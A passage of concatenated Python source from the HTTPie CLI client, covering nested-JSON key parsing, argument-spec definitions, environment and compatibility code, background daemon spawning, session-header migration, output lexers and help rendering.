lines = [f'HTTPie {self.message_kind} Error: {self.message}']
if self.token is not None:
lines.append(self.source)
lines.append(
' ' * (self.token.start)
+ HIGHLIGHTER * (self.token.end - self.token.start)
)
return '\n'.join(lines)
class TokenKind(Enum):
TEXT = auto()
NUMBER = auto()
LEFT_BRACKET = auto()
RIGHT_BRACKET = auto()
def to_name(self) -> str:
for key, value in OPERATORS.items():
if value is self:
return repr(key)
else:
return 'a ' + self.name.lower()
OPERATORS = {OPEN_BRACKET: TokenKind.LEFT_BRACKET, CLOSE_BRACKET: TokenKind.RIGHT_BRACKET}
SPECIAL_CHARS = OPERATORS.keys() | {BACKSLASH}
LITERAL_TOKENS = [TokenKind.TEXT, TokenKind.NUMBER]
class Token(NamedTuple):
kind: TokenKind
value: Union[str, int]
start: int
end: int
def assert_cant_happen() -> NoReturn:
raise ValueError('Unexpected value')
def check_escaped_int(value: str) -> str:
if not value.startswith(BACKSLASH):
raise ValueError('Not an escaped int')
try:
int(value[1:])
except ValueError as exc:
raise ValueError('Not an escaped int') from exc
else:
return value[1:]
def tokenize(source: str) -> Iterator[Token]:
cursor = 0
backslashes = 0
buffer = []
def send_buffer() -> Iterator[Token]:
nonlocal backslashes
if not buffer:
return None
value = ''.join(buffer)
kind = TokenKind.TEXT
if not backslashes:
for variation, kind in [
(int, TokenKind.NUMBER),
(check_escaped_int, TokenKind.TEXT),
]:
try:
value = variation(value)
except ValueError:
continue
else:
break
yield Token(
kind, value, start=cursor - (len(buffer) + backslashes), end=cursor
)
buffer.clear()
backslashes = 0
def can_advance() -> bool:
return cursor < len(source)
while can_advance():
index = source[cursor]
if index in OPERATORS:
yield from send_buffer()
yield Token(OPERATORS[index], index, cursor, cursor + 1)
elif index == BACKSLASH and can_advance():
if source[cursor + 1] in SPECIAL_CHARS:
backslashes += 1
else:
buffer.append(index)
buffer.append(source[cursor + 1])
cursor += 1
else:
buffer.append(index)
cursor += 1
yield from send_buffer()
class PathAction(Enum):
KEY = auto()
INDEX = auto()
APPEND = auto()
# Pseudo action, used by the interpreter
SET = auto()
def to_string(self) -> str:
return self.name.lower()
class Path:
def __init__(
self,
kind: PathAction,
accessor: Optional[Union[str, int]] = None,
tokens: Optional[List[Token]] = None,
is_root: bool = False,
):
self.kind = kind
self.accessor = accessor
self.tokens = tokens or []
self.is_root = is_root
def reconstruct(self) -> str:
if self.kind is PathAction.KEY:
if self.is_root:
return str(self.accessor)
return OPEN_BRACKET + self.accessor + CLOSE_BRACKET
elif self.kind is PathAction.INDEX:
return OPEN_BRACKET + str(self.accessor) + CLOSE_BRACKET
elif self.kind is PathAction.APPEND:
return OPEN_BRACKET + CLOSE_BRACKET
else:
assert_cant_happen()
def parse(source: str) -> Iterator[Path]:
"""
start: root_path path*
root_path: (literal | index_path | append_path)
literal: TEXT | NUMBER
path:
key_path
| index_path
| append_path
key_path: LEFT_BRACKET TEXT RIGHT_BRACKET
index_path: LEFT_BRACKET NUMBER RIGHT_BRACKET
append_path: LEFT_BRACKET RIGHT_BRACKET
"""
tokens = list(tokenize(source))
cursor = 0
def can_advance():
return cursor < len(tokens)
def expect(*kinds):
nonlocal cursor
assert len(kinds) > 0
if can_advance():
token = tokens[cursor]
cursor += 1
if token.kind in kinds:
return token
elif tokens:
token = tokens[-1]._replace(
start=tokens[-1].end + 0, end=tokens[-1].end + 1
)
else:
token = None
if len(kinds) == 1:
suffix = kinds[0].to_name()
else:
suffix = ', '.join(kind.to_name() for kind in kinds[:-1])
suffix += ' or ' + kinds[-1].to_name()
message = f'Expecting {suffix}'
raise HTTPieSyntaxError(source, token, message)
def parse_root():
tokens = []
if not can_advance():
return Path(
PathAction.KEY,
EMPTY_STRING,
is_root=True
)
# (literal | index_path | append_path)?
token = expect(*LITERAL_TOKENS, TokenKind.LEFT_BRACKET)
tokens.append(token)
if token.kind in LITERAL_TOKENS:
action = PathAction.KEY
value = str(token.value)
elif token.kind is TokenKind.LEFT_BRACKET:
token = expect(TokenKind.NUMBER, TokenKind.RIGHT_BRACKET)
tokens.append(token)
if token.kind is TokenKind.NUMBER:
action = PathAction.INDEX
value = token.value
tokens.append(expect(TokenKind.RIGHT_BRACKET))
elif token.kind is TokenKind.RIGHT_BRACKET:
action = PathAction.APPEND
value = None
else:
assert_cant_happen()
else:
assert_cant_happen()
return Path(
action,
value,
tokens=tokens,
is_root=True
)
yield parse_root()
# path*
while can_advance():
path_tokens = []
path_tokens.append(expect(TokenKind.LEFT_BRACKET))
token = expect(
TokenKind.TEXT, TokenKind.NUMBER, TokenKind.RIGHT_BRACKET
)
path_tokens.append(token)
if token.kind is TokenKind.RIGHT_BRACKET:
path = Path(PathAction.APPEND, tokens=path_tokens)
elif token.kind is TokenKind.TEXT:
path = Path(PathAction.KEY, token.value, tokens=path_tokens)
path_tokens.append(expect(TokenKind.RIGHT_BRACKET))
elif token.kind is TokenKind.NUMBER:
path = Path(PathAction.INDEX, token.value, tokens=path_tokens)
path_tokens.append(expect(TokenKind.RIGHT_BRACKET))
else:
assert_cant_happen()
yield path
JSON_TYPE_MAPPING = {
dict: 'object',
list: 'array',
int: 'number',
float: 'number',
str: 'string',
}
def interpret(context: Any, key: str, value: Any) -> Any:
cursor = context
paths = list(parse(key))
paths.append(Path(PathAction.SET, value))
def type_check(index: int, path: Path, expected_type: Type[Any]) -> None:
if not isinstance(cursor, expected_type):
if path.tokens:
pseudo_token = Token(
None, None, path.tokens[0].start, path.tokens[-1].end
)
else:
pseudo_token = None
cursor_type = JSON_TYPE_MAPPING.get(
type(cursor), type(cursor).__name__
)
required_type = JSON_TYPE_MAPPING[expected_type]
message = f"Can't perform {path.kind.to_string()!r} based access on "
message += repr(
''.join(path.reconstruct() for path in paths[:index])
)
message += (
f' which has a type of {cursor_type!r} but this operation'
)
message += f' requires a type of {required_type!r}.'
raise HTTPieSyntaxError(
key, pseudo_token, message, message_kind='Type'
)
def object_for(kind: str) -> Any:
if kind is PathAction.KEY:
return {}
elif kind in {PathAction.INDEX, PathAction.APPEND}:
return []
else:
assert_cant_happen()
for index, (path, next_path) in enumerate(zip(paths, paths[1:])):
# If there is no context yet, set it.
if cursor is None:
context = cursor = object_for(path.kind)
if path.kind is PathAction.KEY:
type_check(index, path, dict)
if next_path.kind is PathAction.SET:
cursor[path.accessor] = next_path.accessor
break
cursor = cursor.setdefault(
path.accessor, object_for(next_path.kind)
)
elif path.kind is PathAction.INDEX:
type_check(index, path, list)
if path.accessor < 0:
raise HTTPieSyntaxError(
key,
path.tokens[1],
'Negative indexes are not supported.',
message_kind='Value',
)
cursor.extend([None] * (path.accessor - len(cursor) + 1))
if next_path.kind is PathAction.SET:
cursor[path.accessor] = next_path.accessor
break
if cursor[path.accessor] is None:
cursor[path.accessor] = object_for(next_path.kind)
cursor = cursor[path.accessor]
elif path.kind is PathAction.APPEND:
type_check(index, path, list)
if next_path.kind is PathAction.SET:
cursor.append(next_path.accessor)
break
cursor.append(object_for(next_path.kind))
cursor = cursor[-1]
else:
assert_cant_happen()
return context
def wrap_with_dict(context):
if context is None:
return {}
elif isinstance(context, list):
return {EMPTY_STRING: NestedJSONArray(context)}
else:
assert isinstance(context, dict)
return context
def interpret_nested_json(pairs):
context = None
for key, value in pairs:
context = interpret(context, key, value)
return wrap_with_dict(context)
```
#### File: httpie/cli/options.py
```python
import argparse
import textwrap
import typing
from dataclasses import dataclass, field
from enum import Enum, auto
from typing import Any, Optional, Dict, List, Tuple, Type, TypeVar
from httpie.cli.argparser import HTTPieArgumentParser
from httpie.cli.utils import Manual, LazyChoices
class Qualifiers(Enum):
OPTIONAL = auto()
ZERO_OR_MORE = auto()
ONE_OR_MORE = auto()
SUPPRESS = auto()
def map_qualifiers(
configuration: Dict[str, Any], qualifier_map: Dict[Qualifiers, Any]
) -> Dict[str, Any]:
return {
key: qualifier_map[value] if isinstance(value, Qualifiers) else value
for key, value in configuration.items()
}
def drop_keys(
configuration: Dict[str, Any], key_blacklist: Tuple[str, ...]
):
return {
key: value
for key, value in configuration.items()
if key not in key_blacklist
}
PARSER_SPEC_VERSION = '0.0.1a0'
@dataclass
class ParserSpec:
program: str
description: Optional[str] = None
epilog: Optional[str] = None
groups: List['Group'] = field(default_factory=list)
man_page_hint: Optional[str] = None
source_file: Optional[str] = None
def finalize(self) -> 'ParserSpec':
if self.description:
self.description = textwrap.dedent(self.description)
if self.epilog:
self.epilog = textwrap.dedent(self.epilog)
for group in self.groups:
group.finalize()
return self
def add_group(self, name: str, **kwargs) -> 'Group':
group = Group(name, **kwargs)
self.groups.append(group)
return group
def serialize(self) -> Dict[str, Any]:
return {
'name': self.program,
'description': self.description,
'groups': [group.serialize() for group in self.groups],
}
@dataclass
class Group:
name: str
description: str = ''
is_mutually_exclusive: bool = False
arguments: List['Argument'] = field(default_factory=list)
def finalize(self) -> None:
if self.description:
self.description = textwrap.dedent(self.description)
def add_argument(self, *args, **kwargs):
argument = Argument(list(args), kwargs.copy())
argument.post_init()
self.arguments.append(argument)
return argument
def serialize(self) -> Dict[str, Any]:
return {
'name': self.name,
'description': self.description or None,
'is_mutually_exclusive': self.is_mutually_exclusive,
'args': [argument.serialize() for argument in self.arguments],
}
class Argument(typing.NamedTuple):
aliases: List[str]
configuration: Dict[str, Any]
def post_init(self):
"""Run a bunch of post-init hooks."""
# If there is a short help, then create the longer version from it.
short_help = self.configuration.get('short_help')
if (
short_help
and 'help' not in self.configuration
and self.configuration.get('action') != 'lazy_choices'
):
self.configuration['help'] = f'\n{short_help}\n\n'
def serialize(self, *, isolation_mode: bool = False) -> Dict[str, Any]:
configuration = self.configuration.copy()
# Unpack the dynamically computed choices, since we
# will need to store the actual values somewhere.
action = configuration.pop('action', None)
short_help = configuration.pop('short_help', None)
nested_options = configuration.pop('nested_options', None)
if action == 'lazy_choices':
choices = LazyChoices(
self.aliases,
**{'dest': None, **configuration},
isolation_mode=isolation_mode
)
configuration['choices'] = list(choices.load())
configuration['help'] = choices.help
result = {}
if self.aliases:
result['options'] = self.aliases.copy()
else:
result['options'] = [configuration['metavar']]
result['is_positional'] = True
qualifiers = JSON_QUALIFIER_TO_OPTIONS[configuration.get('nargs', Qualifiers.SUPPRESS)]
result.update(qualifiers)
description = configuration.get('help')
if description and description is not Qualifiers.SUPPRESS:
result['short_description'] = short_help
result['description'] = description
if nested_options:
result['nested_options'] = nested_options
python_type = configuration.get('type')
if python_type is not None:
if hasattr(python_type, '__name__'):
type_name = python_type.__name__
else:
type_name = type(python_type).__name__
result['python_type_name'] = type_name
result.update({
key: value
for key, value in configuration.items()
if key in JSON_DIRECT_MIRROR_OPTIONS
if value is not Qualifiers.SUPPRESS
})
return result
@property
def is_positional(self):
return len(self.aliases) == 0
@property
def is_hidden(self):
return self.configuration.get('help') is Qualifiers.SUPPRESS
def __getattr__(self, attribute_name):
if attribute_name in self.configuration:
return self.configuration[attribute_name]
else:
raise AttributeError(attribute_name)
ParserType = TypeVar('ParserType', bound=Type[argparse.ArgumentParser])
ARGPARSE_QUALIFIER_MAP = {
Qualifiers.OPTIONAL: argparse.OPTIONAL,
Qualifiers.SUPPRESS: argparse.SUPPRESS,
Qualifiers.ZERO_OR_MORE: argparse.ZERO_OR_MORE,
Qualifiers.ONE_OR_MORE: argparse.ONE_OR_MORE
}
ARGPARSE_IGNORE_KEYS = ('short_help', 'nested_options')
def to_argparse(
abstract_options: ParserSpec,
parser_type: ParserType = HTTPieArgumentParser,
) -> ParserType:
concrete_parser = parser_type(
prog=abstract_options.program,
description=abstract_options.description,
epilog=abstract_options.epilog,
)
concrete_parser.spec = abstract_options
concrete_parser.register('action', 'lazy_choices', LazyChoices)
concrete_parser.register('action', 'manual', Manual)
for abstract_group in abstract_options.groups:
concrete_group = concrete_parser.add_argument_group(
title=abstract_group.name, description=abstract_group.description
)
if abstract_group.is_mutually_exclusive:
concrete_group = concrete_group.add_mutually_exclusive_group(required=False)
for abstract_argument in abstract_group.arguments:
concrete_group.add_argument(
*abstract_argument.aliases,
**drop_keys(map_qualifiers(
abstract_argument.configuration, ARGPARSE_QUALIFIER_MAP
), ARGPARSE_IGNORE_KEYS)
)
return concrete_parser
JSON_DIRECT_MIRROR_OPTIONS = (
'choices',
'metavar'
)
JSON_QUALIFIER_TO_OPTIONS = {
Qualifiers.OPTIONAL: {'is_optional': True},
Qualifiers.ZERO_OR_MORE: {'is_optional': True, 'is_variadic': True},
Qualifiers.ONE_OR_MORE: {'is_optional': False, 'is_variadic': True},
Qualifiers.SUPPRESS: {}
}
def to_data(abstract_options: ParserSpec) -> Dict[str, Any]:
return {'version': PARSER_SPEC_VERSION, 'spec': abstract_options.serialize()}
def parser_to_parser_spec(parser: argparse.ArgumentParser, **kwargs) -> ParserSpec:
"""Take an existing argparse parser, and create a spec from it."""
return ParserSpec(
program=parser.prog,
description=parser.description,
epilog=parser.epilog,
**kwargs
)
```
#### File: httpie/httpie/compat.py
```python
import sys
from typing import Any, Optional, Iterable
from httpie.cookies import HTTPieCookiePolicy
from http import cookiejar # noqa
# Request does not carry the original policy attached to the
# cookie jar, so until it is resolved we change the global cookie
# policy. <https://github.com/psf/requests/issues/5449>
cookiejar.DefaultCookiePolicy = HTTPieCookiePolicy
is_windows = 'win32' in str(sys.platform).lower()
is_frozen = getattr(sys, 'frozen', False)
MIN_SUPPORTED_PY_VERSION = (3, 7)
MAX_SUPPORTED_PY_VERSION = (3, 11)
try:
from functools import cached_property
except ImportError:
# Can be removed once we drop Python <3.8 support.
# Taken from `django.utils.functional.cached_property`.
class cached_property:
"""
Decorator that converts a method with a single self argument into a
property cached on the instance.
A cached property can be made out of an existing method:
(e.g. ``url = cached_property(get_absolute_url)``).
The optional ``name`` argument is obsolete as of Python 3.6 and will be
deprecated in Django 4.0 (#30127).
"""
name = None
@staticmethod
def func(instance):
raise TypeError(
'Cannot use cached_property instance without calling '
'__set_name__() on it.'
)
def __init__(self, func, name=None):
self.real_func = func
self.__doc__ = getattr(func, '__doc__')
def __set_name__(self, owner, name):
if self.name is None:
self.name = name
self.func = self.real_func
elif name != self.name:
raise TypeError(
"Cannot assign the same cached_property to two different names "
"(%r and %r)." % (self.name, name)
)
def __get__(self, instance, cls=None):
"""
Call the function and put the return value in instance.__dict__ so that
subsequent attribute access on the instance returns the cached value
instead of calling cached_property.__get__().
"""
if instance is None:
return self
res = instance.__dict__[self.name] = self.func(instance)
return res
# importlib_metadata was a provisional module, so the APIs changed quite a few times
# between 3.8-3.10. It was also not included in the standard library until 3.8, so
# we install the backport for <3.8.
if sys.version_info >= (3, 8):
import importlib.metadata as importlib_metadata
else:
import importlib_metadata
def find_entry_points(entry_points: Any, group: str) -> Iterable[importlib_metadata.EntryPoint]:
if hasattr(entry_points, "select"): # Python 3.10+ / importlib_metadata >= 3.9.0
return entry_points.select(group=group)
else:
return set(entry_points.get(group, ()))
def get_dist_name(entry_point: importlib_metadata.EntryPoint) -> Optional[str]:
dist = getattr(entry_point, "dist", None)
if dist is not None: # Python 3.10+
return dist.name
match = entry_point.pattern.match(entry_point.value)
if not (match and match.group('module')):
return None
package = match.group('module').split('.')[0]
try:
metadata = importlib_metadata.metadata(package)
except importlib_metadata.PackageNotFoundError:
return None
else:
return metadata.get('name')
```
#### File: httpie/httpie/context.py
```python
import argparse
import sys
import os
import warnings
from contextlib import contextmanager
from pathlib import Path
from typing import Iterator, IO, Optional, TYPE_CHECKING
from enum import Enum
try:
import curses
except ImportError:
curses = None # Compiled w/o curses
from .compat import is_windows, cached_property
from .config import DEFAULT_CONFIG_DIR, Config, ConfigFileError
from .encoding import UTF8
from .utils import repr_dict
from .output.ui.palette import GenericColor
if TYPE_CHECKING:
from rich.console import Console
class LogLevel(str, Enum):
INFO = 'info'
WARNING = 'warning'
ERROR = 'error'
LOG_LEVEL_COLORS = {
LogLevel.INFO: GenericColor.PINK,
LogLevel.WARNING: GenericColor.ORANGE,
LogLevel.ERROR: GenericColor.RED,
}
LOG_LEVEL_DISPLAY_THRESHOLDS = {
LogLevel.INFO: 1,
LogLevel.WARNING: 2,
LogLevel.ERROR: float('inf'), # Never hide errors.
}
class Environment:
"""
Information about the execution context
(standard streams, config directory, etc).
By default, it represents the actual environment.
All of the attributes can be overwritten though, which
is used by the test suite to simulate various scenarios.
"""
args = argparse.Namespace()
is_windows: bool = is_windows
config_dir: Path = DEFAULT_CONFIG_DIR
stdin: Optional[IO] = sys.stdin # `None` when closed fd (#791)
stdin_isatty: bool = stdin.isatty() if stdin else False
stdin_encoding: str = None
stdout: IO = sys.stdout
stdout_isatty: bool = stdout.isatty()
stdout_encoding: str = None
stderr: IO = sys.stderr
stderr_isatty: bool = stderr.isatty()
colors = 256
program_name: str = 'http'
# Whether to show progress bars / status spinners etc.
show_displays: bool = True
if not is_windows:
if curses:
try:
curses.setupterm()
colors = curses.tigetnum('colors')
except curses.error:
pass
else:
# noinspection PyUnresolvedReferences
import colorama.initialise
stdout = colorama.initialise.wrap_stream(
stdout, convert=None, strip=None,
autoreset=True, wrap=True
)
stderr = colorama.initialise.wrap_stream(
stderr, convert=None, strip=None,
autoreset=True, wrap=True
)
del colorama
def __init__(self, devnull=None, **kwargs):
"""
Use keyword arguments to overwrite
any of the class attributes for this instance.
"""
assert all(hasattr(type(self), attr) for attr in kwargs.keys())
self.__dict__.update(**kwargs)
# The original STDERR unaffected by --quiet’ing.
self._orig_stderr = self.stderr
self._devnull = devnull
# Keyword arguments > stream.encoding > default UTF-8
if self.stdin and self.stdin_encoding is None:
self.stdin_encoding = getattr(
self.stdin, 'encoding', None) or UTF8
if self.stdout_encoding is None:
actual_stdout = self.stdout
if is_windows:
# noinspection PyUnresolvedReferences
from colorama import AnsiToWin32
if isinstance(self.stdout, AnsiToWin32):
# noinspection PyUnresolvedReferences
actual_stdout = self.stdout.wrapped
self.stdout_encoding = getattr(
actual_stdout, 'encoding', None) or UTF8
self.quiet = kwargs.pop('quiet', 0)
def __str__(self):
defaults = dict(type(self).__dict__)
actual = dict(defaults)
actual.update(self.__dict__)
actual['config'] = self.config
return repr_dict({
key: value
for key, value in actual.items()
if not key.startswith('_')
})
def __repr__(self):
return f'<{type(self).__name__} {self}>'
_config: Config = None
@property
def config(self) -> Config:
config = self._config
if not config:
self._config = config = Config(directory=self.config_dir)
if not config.is_new():
try:
config.load()
except ConfigFileError as e:
self.log_error(e, level='warning')
return config
@property
def devnull(self) -> IO:
if self._devnull is None:
self._devnull = open(os.devnull, 'w+')
return self._devnull
@contextmanager
def as_silent(self) -> Iterator[None]:
original_stdout = self.stdout
original_stderr = self.stderr
try:
self.stdout = self.devnull
self.stderr = self.devnull
yield
finally:
self.stdout = original_stdout
self.stderr = original_stderr
def log_error(self, msg: str, level: LogLevel = LogLevel.ERROR) -> None:
if self.stdout_isatty and self.quiet >= LOG_LEVEL_DISPLAY_THRESHOLDS[level]:
stderr = self.stderr # Not directly /dev/null, since stderr might be mocked
else:
stderr = self._orig_stderr
rich_console = self._make_rich_console(file=stderr, force_terminal=stderr.isatty())
rich_console.print(
f'\n{self.program_name}: {level}: {msg}\n\n',
style=LOG_LEVEL_COLORS[level],
markup=False,
highlight=False,
soft_wrap=True
)
def apply_warnings_filter(self) -> None:
if self.quiet >= LOG_LEVEL_DISPLAY_THRESHOLDS[LogLevel.WARNING]:
warnings.simplefilter("ignore")
def _make_rich_console(
self,
file: IO[str],
force_terminal: bool
) -> 'Console':
from rich.console import Console
from httpie.output.ui.rich_palette import _make_rich_color_theme
style = getattr(self.args, 'style', None)
theme = _make_rich_color_theme(style)
# Rich infers the rest of the knowledge (e.g encoding)
# dynamically by looking at the file/stderr.
return Console(
file=file,
force_terminal=force_terminal,
no_color=(self.colors == 0),
theme=theme
)
# Rich recommends separating the actual console (stdout) from
# the error (stderr) console for better isolation between parts.
# https://rich.readthedocs.io/en/stable/console.html#error-console
@cached_property
def rich_console(self):
return self._make_rich_console(self.stdout, self.stdout_isatty)
@cached_property
def rich_error_console(self):
return self._make_rich_console(self.stderr, self.stderr_isatty)
```
#### File: httpie/internal/daemons.py
```python
import inspect
import os
import platform
import sys
import httpie.__main__
from contextlib import suppress
from subprocess import Popen, DEVNULL
from typing import Dict, List
from httpie.compat import is_frozen, is_windows
ProcessContext = Dict[str, str]
def _start_process(cmd: List[str], **kwargs) -> Popen:
prefix = [sys.executable]
# If it is frozen, sys.executable points to the binary (http).
# Otherwise it points to the python interpreter.
if not is_frozen:
main_entrypoint = httpie.__main__.__file__
prefix += [main_entrypoint]
return Popen(prefix + cmd, close_fds=True, shell=False, stdout=DEVNULL, stderr=DEVNULL, **kwargs)
def _spawn_windows(cmd: List[str], process_context: ProcessContext) -> None:
from subprocess import (
CREATE_NEW_PROCESS_GROUP,
CREATE_NO_WINDOW,
STARTF_USESHOWWINDOW,
STARTUPINFO,
)
# https://stackoverflow.com/a/7006424
# https://bugs.python.org/issue41619
creationflags = CREATE_NEW_PROCESS_GROUP | CREATE_NO_WINDOW
startupinfo = STARTUPINFO()
startupinfo.dwFlags |= STARTF_USESHOWWINDOW
_start_process(
cmd,
env=process_context,
creationflags=creationflags,
startupinfo=startupinfo,
)
def _spawn_posix(args: List[str], process_context: ProcessContext) -> None:
"""
Perform a double fork procedure* to detach from the parent
process so that we don't block the user even if their original
command's execution is done but the release fetcher is not.
[1]: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap11.html#tag_11_01_03
"""
from httpie.core import main
try:
pid = os.fork()
if pid > 0:
return
except OSError:
os._exit(1)
os.setsid()
try:
pid = os.fork()
if pid > 0:
os._exit(0)
except OSError:
os._exit(1)
# Close all standard inputs/outputs
sys.stdin.close()
sys.stdout.close()
sys.stderr.close()
if platform.system() == 'Darwin':
# Double-fork is not reliable on MacOS, so we'll use a subprocess
# to ensure the task is isolated properly.
process = _start_process(args, env=process_context)
# Unlike windows, since we already completed the fork procedure
# we can simply join the process and wait for it.
process.communicate()
else:
os.environ.update(process_context)
with suppress(BaseException):
main(['http'] + args)
os._exit(0)
def _spawn(args: List[str], process_context: ProcessContext) -> None:
"""
Spawn a new process to run the given command.
"""
if is_windows:
_spawn_windows(args, process_context)
else:
_spawn_posix(args, process_context)
def spawn_daemon(task: str) -> None:
args = [task, '--daemon']
process_context = os.environ.copy()
if not is_frozen:
file_path = os.path.abspath(inspect.stack()[0][1])
process_context['PYTHONPATH'] = os.path.dirname(
os.path.dirname(os.path.dirname(file_path))
)
_spawn(args, process_context)
```
#### File: httpie/legacy/v3_2_0_session_header_format.py
```python
from typing import Any, Type, List, Dict, TYPE_CHECKING
if TYPE_CHECKING:
from httpie.sessions import Session
OLD_HEADER_STORE_WARNING = '''\
Outdated layout detected for the current session. Please consider updating it,
in order to use the latest features regarding the header layout.
For fixing the current session:
$ httpie cli sessions upgrade {hostname} {session_id}
'''
OLD_HEADER_STORE_WARNING_FOR_NAMED_SESSIONS = '''\
For fixing all named sessions:
$ httpie cli sessions upgrade-all
'''
OLD_HEADER_STORE_LINK = '\nSee $INSERT_LINK for more information.'
def pre_process(session: 'Session', headers: Any) -> List[Dict[str, Any]]:
"""Serialize the headers into a unified form and issue a warning if
the session file is using the old layout."""
is_old_style = isinstance(headers, dict)
if is_old_style:
normalized_headers = list(headers.items())
else:
normalized_headers = [
(item['name'], item['value'])
for item in headers
]
if is_old_style:
warning = OLD_HEADER_STORE_WARNING.format(hostname=session.bound_host, session_id=session.session_id)
if not session.is_anonymous:
warning += OLD_HEADER_STORE_WARNING_FOR_NAMED_SESSIONS
warning += OLD_HEADER_STORE_LINK
session.warn_legacy_usage(warning)
return normalized_headers
def post_process(
normalized_headers: List[Dict[str, Any]],
*,
original_type: Type[Any]
) -> Any:
"""Deserialize given header store into the original form it was
used in."""
if issubclass(original_type, dict):
# For the legacy behavior, preserve the last value.
return {
item['name']: item['value']
for item in normalized_headers
}
else:
return normalized_headers
def fix_layout(session: 'Session', *args, **kwargs) -> None:
from httpie.sessions import materialize_headers
if not isinstance(session['headers'], dict):
return None
session['headers'] = materialize_headers(session['headers'])
```
#### File: output/lexers/common.py
```python
def precise(lexer, precise_token, parent_token):
# Due to a pygments bug*, custom tokens will look bad
# on outside styles. Until it is fixed on upstream, we'll
# convey whether the client is using pie style or not
# through precise option and return more precise tokens
# depending on it's value.
#
# [0]: https://github.com/pygments/pygments/issues/1986
if precise_token is None or not lexer.options.get("precise"):
return parent_token
else:
return precise_token
```
#### File: output/lexers/metadata.py
```python
import pygments
from httpie.models import ELAPSED_TIME_LABEL
from httpie.output.lexers.common import precise
SPEED_TOKENS = {
0.45: pygments.token.Number.SPEED.FAST,
1.00: pygments.token.Number.SPEED.AVG,
2.50: pygments.token.Number.SPEED.SLOW,
}
def speed_based_token(lexer, match, ctx):
try:
value = float(match.group())
except ValueError:
return pygments.token.Number
for limit, token in SPEED_TOKENS.items():
if value <= limit:
break
else:
token = pygments.token.Number.SPEED.VERY_SLOW
response_type = precise(
lexer,
token,
pygments.token.Number
)
yield match.start(), response_type, match.group()
class MetadataLexer(pygments.lexer.RegexLexer):
"""Simple HTTPie metadata lexer."""
tokens = {
'root': [
(
fr'({ELAPSED_TIME_LABEL})( *)(:)( *)(\d+\.\d+)(s)', pygments.lexer.bygroups(
pygments.token.Name.Decorator, # Name
pygments.token.Text,
pygments.token.Operator, # Colon
pygments.token.Text,
speed_based_token,
pygments.token.Name.Builtin # Value
)
),
# Generic item
(
r'(.*?)( *)(:)( *)(.+)', pygments.lexer.bygroups(
pygments.token.Name.Decorator, # Name
pygments.token.Text,
pygments.token.Operator, # Colon
pygments.token.Text,
pygments.token.Text # Value
)
),
]
}
```
#### File: output/ui/man_pages.py
```python
import subprocess
import os
from httpie.context import Environment
MAN_COMMAND = 'man'
NO_MAN_PAGES = os.getenv('HTTPIE_NO_MAN_PAGES', False)
# On some systems, HTTP(n) might exist but we are only
# interested in HTTP(1).
#
# For more information on man page sections: https://unix.stackexchange.com/a/138643
MAN_PAGE_SECTION = '1'
def is_available(program: str) -> bool:
"""Check whether HTTPie's man pages are available in this system."""
if NO_MAN_PAGES or os.system == 'nt':
return False
try:
process = subprocess.run(
[MAN_COMMAND, MAN_PAGE_SECTION, program],
shell=False,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
except Exception:
# There might be some errors outside of the process, e.g
# a permission error to execute something that is not an
# executable.
return False
else:
return process.returncode == 0
def display_for(env: Environment, program: str) -> None:
"""Display the man page for the given command (http/https)."""
subprocess.run(
[MAN_COMMAND, MAN_PAGE_SECTION, program],
stdout=env.stdout,
stderr=env.stderr
)
```
#### File: output/ui/rich_help.py
```python
import re
import textwrap
from typing import AbstractSet, Iterable, Optional, Tuple
from rich.console import RenderableType
from rich.highlighter import RegexHighlighter
from rich.padding import Padding
from rich.table import Table
from rich.text import Text
from httpie.cli.constants import SEPARATOR_GROUP_ALL_ITEMS
from httpie.cli.options import Argument, ParserSpec, Qualifiers
from httpie.output.ui.palette import GenericColor
SEPARATORS = '|'.join(map(re.escape, SEPARATOR_GROUP_ALL_ITEMS))
STYLE_METAVAR = GenericColor.YELLOW
STYLE_SWITCH = GenericColor.GREEN
STYLE_PROGRAM_NAME = GenericColor.GREEN # .boldify()
STYLE_USAGE_OPTIONAL = GenericColor.GREY
STYLE_USAGE_REGULAR = GenericColor.WHITE
STYLE_USAGE_ERROR = GenericColor.RED
STYLE_USAGE_MISSING = GenericColor.YELLOW
STYLE_BOLD = 'bold'
MAX_CHOICE_CHARS = 80
LEFT_PADDING_2 = (0, 0, 0, 2)
LEFT_PADDING_3 = (0, 0, 0, 3)
LEFT_PADDING_4 = (0, 0, 0, 4)
LEFT_PADDING_5 = (0, 0, 0, 4)
LEFT_INDENT_2 = (1, 0, 0, 2)
LEFT_INDENT_3 = (1, 0, 0, 3)
LEFT_INDENT_BOTTOM_3 = (0, 0, 1, 3)
MORE_INFO_COMMANDS = """
To learn more, you can try:
-> running 'http --manual'
-> visiting our full documentation at https://httpie.io/docs/cli
"""
class OptionsHighlighter(RegexHighlighter):
highlights = [
r'(^|\W)(?P<option>\-{1,2}[\w|-]+)(?![a-zA-Z0-9])',
r'(?P<bold>HTTPie)',
]
options_highlighter = OptionsHighlighter()
def unpack_argument(
argument: Argument,
) -> Tuple[Text, Text]:
opt1 = opt2 = ''
style = None
if argument.aliases:
if len(argument.aliases) >= 2:
opt2, opt1 = argument.aliases
else:
(opt1,) = argument.aliases
else:
opt1 = argument.metavar
style = STYLE_USAGE_REGULAR
return Text(opt1, style=style), Text(opt2)
def to_usage(
spec: ParserSpec,
*,
program_name: Optional[str] = None,
whitelist: AbstractSet[str] = frozenset()
) -> RenderableType:
shown_arguments = [
argument
for group in spec.groups
for argument in group.arguments
if (not argument.aliases or whitelist.intersection(argument.aliases))
]
# Sort the shown_arguments so that --dash options are
# shown first
shown_arguments.sort(key=lambda argument: argument.aliases, reverse=True)
text = Text(program_name or spec.program, style=STYLE_BOLD)
for argument in shown_arguments:
text.append(' ')
is_whitelisted = whitelist.intersection(argument.aliases)
if argument.aliases:
name = '/'.join(sorted(argument.aliases, key=len))
else:
name = argument.metavar
nargs = argument.configuration.get('nargs')
if nargs is Qualifiers.OPTIONAL:
text.append('[' + name + ']', style=STYLE_USAGE_OPTIONAL)
elif nargs is Qualifiers.ZERO_OR_MORE:
text.append(
'[' + name + ' ...]',
style=STYLE_USAGE_OPTIONAL,
)
else:
text.append(
name,
style=STYLE_USAGE_ERROR
if is_whitelisted
else STYLE_USAGE_REGULAR,
)
raw_form = argument.serialize()
if raw_form.get('choices'):
text.append(' ')
text.append(
'{' + ', '.join(raw_form['choices']) + '}',
style=STYLE_USAGE_MISSING,
)
return text
# This part is loosely based on the rich-click's help message
# generation.
def to_help_message(
spec: ParserSpec,
) -> Iterable[RenderableType]:
